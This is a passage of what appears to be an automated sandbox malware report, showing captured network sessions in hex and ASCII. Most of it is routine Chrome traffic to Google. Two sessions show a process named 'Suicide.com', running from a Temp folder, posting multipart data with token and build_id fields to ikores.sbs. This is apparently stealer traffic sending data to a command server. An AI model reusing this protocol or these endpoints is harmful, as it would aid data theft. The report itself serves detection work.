31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 38 2c 33 37 30 31 33 38 34 2c 31 30 32 31 31 38 39 33 39 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700338,3701384,102118939],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 Data Ascii: Array(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 59 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 5a 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 Data Ascii: hrow Error(\"F\");};_.Zd\u003dfunction(a){if(Yd.test(a))return a};_.$d\u003dfunction(a){if(a instanceof _.Kd)if(a instanceof _.Kd)a\u003da.i;else throw Error(\"F\");else a\u003d_.Zd(a);return a};_.ae\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6d 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 41 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 Data Ascii: .querySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.me\u003dfunction(a,b){_.Ab(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"
2024-12-05 20:51:52 UTC	579	IN	Data Raw: 75 72 6e 20 5f 2e 6f 65 28 64 6f 63 75 6d 65 6e 74 2c 61 29 7d 3b 5f 2e 6f 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 5c 75 30 30 33 64 53 74 72 69 6e 67 28 62 29 3b 61 2e 63 6f 6e 74 65 6e 74 54 79 70 65 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 28 62 5c 75 30 30 33 64 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 29 7d 3b 5f 2e 73 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6c 65 74 20 62 3b 66 6f 72 28 3b 62 5c 75 30 30 33 64 61 2e 66 69 72 73 74 43 68 69 6c 64 3b 29 61 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 62 29 7d 3b Data Ascii: urn _.oe(document,a)};_.oe\u003dfunction(a,b){b\u003dString(b);a.contentType\u003d\u003d\u003d\"application/xhtml+xml\"\u0026\u0026(b\u003db.toLowerCase());return a.createElement(b)};_.se\u003dfunction(a){let b;for(;b\u003da.firstChild;)a.removeChild(b)};

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49934	142.250.181.100	443	3056	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:51 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-05 20:51:52 UTC	933	IN	HTTP/1.1 200 OK Version: 702228742 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Thu, 05 Dec 2024 20:51:52 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-05 20:51:52 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-05 20:51:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49958	5.75.212.196	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:56 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----TR9Z5XBSR1N7YU3OPPZ5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: ikores.sbs Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:51:56 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 58 42 53 52 31 4e 37 59 55 33 4f 50 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 35 37 62 32 31 39 37 63 63 66 32 37 64 37 63 38 66 34 38 61 37 32 63 37 39 61 66 63 64 38 0d 0a 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 58 42 53 52 31 4e 37 59 55 33 4f 50 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 58 42 53 52 31 4e 37 59 55 33 4f 50 50 5a 35 0d 0a 43 6f 6e 74 Data Ascii: ------TR9Z5XBSR1N7YU3OPPZ5Content-Disposition: form-data; name="token"a957b2197ccf27d7c8f48a72c79afcd8------TR9Z5XBSR1N7YU3OPPZ5Content-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------TR9Z5XBSR1N7YU3OPPZ5Cont
2024-12-05 20:51:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Dec 2024 20:51:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-05 20:51:57 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49962	5.75.212.196	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:57 UTC	320	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----C2VKNO8Q1DJM7YUS2VS2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: ikores.sbs Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:51:57 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 4f 38 51 31 44 4a 4d 37 59 55 53 32 56 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 35 37 62 32 31 39 37 63 63 66 32 37 64 37 63 38 66 34 38 61 37 32 63 37 39 61 66 63 64 38 0d 0a 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 4f 38 51 31 44 4a 4d 37 59 55 53 32 56 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 4f 38 51 31 44 4a 4d 37 59 55 53 32 56 53 32 0d 0a 43 6f 6e 74 Data Ascii: ------C2VKNO8Q1DJM7YUS2VS2Content-Disposition: form-data; name="token"a957b2197ccf27d7c8f48a72c79afcd8------C2VKNO8Q1DJM7YUS2VS2Content-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------C2VKNO8Q1DJM7YUS2VS2Cont
2024-12-05 20:51:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:51:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:51:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:51:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:51:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:51:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:51:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:51:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:51:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:51:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Dec 2024 20:51:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
